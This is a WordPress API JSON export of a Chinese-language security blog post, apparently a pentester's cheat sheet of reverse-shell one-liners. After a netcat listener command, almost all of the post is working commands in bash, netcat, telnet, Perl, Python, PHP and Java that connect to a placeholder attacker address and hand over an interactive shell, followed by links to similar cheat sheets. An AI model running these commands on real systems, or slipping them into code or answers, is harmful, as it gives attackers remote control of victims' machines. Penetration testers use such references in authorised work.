{"id":3275,"date":"2017-04-04T12:55:38","date_gmt":"2017-04-04T04:55:38","guid":{"rendered":"https:\/\/ixyzero.com\/blog\/?p=3275"},"modified":"2018-05-19T21:21:53","modified_gmt":"2018-05-19T13:21:53","slug":"%e5%90%84%e7%a7%8d%e5%8f%8d%e5%bc%b9shell%e8%ae%b0%e5%bd%95%e6%80%bb%e7%bb%93","status":"publish","type":"post","link":"https:\/\/ixyzero.com\/blog\/archives\/3275.html","title":{"rendered":"\u5404\u79cd\u53cd\u5f39shell\u8bb0\u5f55\/\u603b\u7ed3"},"content":{"rendered":"<p>=Start=<\/p>\n<h4>\u7f18\u7531\uff1a<\/h4>\n<p>\u5728\u5de5\u4f5c\u4e2d\u6709\u65f6\u4f1a\u9700\u8981\u7528\u5404\u79cd\u8bed\u8a00\u7684\u53cd\u5f39shell\u6765\u8fdb\u884c\u6d4b\u8bd5\uff0c\u5728\u6b64\u8bb0\u5f55\u4e00\u4e0b\uff0c\u65b9\u4fbf\u8981\u7528\u5230\u7684\u65f6\u5019\u505a\u4e2a\u53c2\u8003\u3002<\/p>\n<h4>\u6b63\u6587\uff1a<\/h4>\n<h5>\u53c2\u8003\u89e3\u7b54\uff1a<\/h5>\n<h6>\u6b65\u9aa4\u4e00\uff1a\u5148\u5728\u672c\u5730\u76d1\u542c<\/h6>\n<pre class=\"lang:default decode:true\">root@kali:~# nc -nvlp 12345<\/pre>\n<p>\u5907\u6ce8\uff1a\u9700\u8981\u5c06\u4e0a\u9762\u7684 12345 \u7aef\u53e3\u548c\u4e0b\u9762\u8981\u6267\u884c\u547d\u4ee4\u4e2d\u7684\u7aef\u53e3\u8fdb\u884c\u5bf9\u5e94\u3002<\/p>\n<h6>\u6b65\u9aa4\u4e8c\uff1a\u518d\u5728\u8fdc\u7a0b\u6267\u884c\u53cd\u5f39shell\u547d\u4ee4<\/h6>\n<p># Bash<\/p>\n<pre class=\"lang:default decode:true\">bash -i &gt;&amp; \/dev\/tcp\/x.x.x.x\/12345 0&gt;&amp;1<\/pre>\n<p># nc\u652f\u6301&#8217;-e&#8217;<\/p>\n<pre class=\"lang:default decode:true\">nc -e \/bin\/sh x.x.x.x 12345<\/pre>\n<p># nc\u4e0d\u652f\u6301&#8217;-e&#8217;<\/p>\n<pre class=\"lang:default decode:true\">rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc x.x.x.x 12345 &gt;\/tmp\/f<\/pre>\n<p># Telnet<\/p>\n<pre class=\"lang:default decode:true\">rm -f \/tmp\/p; mknod \/tmp\/p p &amp;&amp; telnet x.x.x.x 12345 0&lt;\/tmp\/p | \/bin\/bash 1&gt;\/tmp\/p<\/pre>\n<p># Perl<\/p>\n<pre class=\"lang:default decode:true\">perl -e 'use Socket;$i=\"x.x.x.x\";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"&gt;&amp;S\");open(STDOUT,\"&gt;&amp;S\");open(STDERR,\"&gt;&amp;S\");exec(\"\/bin\/sh -i\");};'<\/pre>\n<p># Python<\/p>\n<pre class=\"lang:default decode:true\">python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"x.x.x.x\",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"\/bin\/sh\",\"-i\"]);'<\/pre>\n<p># PHP<\/p>\n<pre class=\"lang:default decode:true \">php -r '$sock=fsockopen(\"x.x.x.x\",12345);exec(\"\/bin\/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3\");'<\/pre>\n<p># Java<\/p>\n<pre class=\"lang:default decode:true\">r = Runtime.getRuntime()\r\np = r.exec([\"\/bin\/bash\",\"-c\",\"exec 5&lt;&gt;\/dev\/tcp\/x.x.x.x\/12345;cat &lt;&amp;5 | while read line; do \\$line 2&gt;&amp;5 &gt;&amp;5; done\"] as String[])\r\np.waitFor()<\/pre>\n<h5>\u53c2\u8003\u94fe\u63a5\uff1a<\/h5>\n<ul>\n<li><a href=\"http:\/\/pentestmonkey.net\/cheat-sheet\/shells\/reverse-shell-cheat-sheet\">http:\/\/pentestmonkey.net\/cheat-sheet\/shells\/reverse-shell-cheat-sheet<\/a><\/li>\n<li><a href=\"https:\/\/highon.coffee\/blog\/reverse-shell-cheat-sheet\/\">https:\/\/highon.coffee\/blog\/reverse-shell-cheat-sheet\/<\/a><\/li>\n<li><a href=\"https:\/\/jivoi.github.io\/2015\/07\/01\/pentest-tips-and-tricks\/\">https:\/\/jivoi.github.io\/2015\/07\/01\/pentest-tips-and-tricks\/<\/a><\/li>\n<li><a href=\"http:\/\/bernardodamele.blogspot.com\/2011\/09\/reverse-shells-one-liners.html\">http:\/\/bernardodamele.blogspot.com\/2011\/09\/reverse-shells-one-liners.html<\/a><\/li>\n<li><a href=\"http:\/\/www.91ri.org\/9367.html\">http:\/\/www.91ri.org\/9367.html<\/a><\/li>\n<li><a href=\"https:\/\/www.leavesongs.com\/PYTHON\/python-shell-backdoor.html\">https:\/\/www.leavesongs.com\/PYTHON\/python-shell-backdoor.html<\/a><\/li>\n<li><a href=\"https:\/\/www.waitalone.cn\/linux-shell-rebound-under-way.html\">https:\/\/www.waitalone.cn\/linux-shell-rebound-under-way.html<\/a><\/li>\n<\/ul>\n<p>=END=<\/p>\n","protected":false},"excerpt":{"rendered":"<p>=Start= \u7f18\u7531\uff1a \u5728\u5de5\u4f5c\u4e2d\u6709\u65f6\u4f1a\u9700\u8981\u7528\u5404\u79cd\u8bed\u8a00\u7684\u53cd\u5f39shell\u6765\u8fdb\u884c\u6d4b\u8bd5\uff0c\u5728\u6b64\u8bb0\u5f55\u4e00\u4e0b\uff0c\u65b9\u4fbf\u8981\u7528\u5230\u7684\u65f6\u5019 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[23,11,25],"tags":[779,780,37],"class_list":["post-3275","post","type-post","status-publish","format-standard","hentry","category-knowledgebase-2","category-linux","category-security","tag-cheat-sheet","tag-reverse-shell","tag-security"],"views":8435,"_links":{"self":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/3275","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/comments?post=3275"}],"version-history":[{"count":1,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/3275\/revisions"}],"predecessor-version":[{"id":3276,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/3275\/revisions\/3276"}],"wp:attachment":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/media?parent=3275"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/categories?post=3275"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/tags?post=3275"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}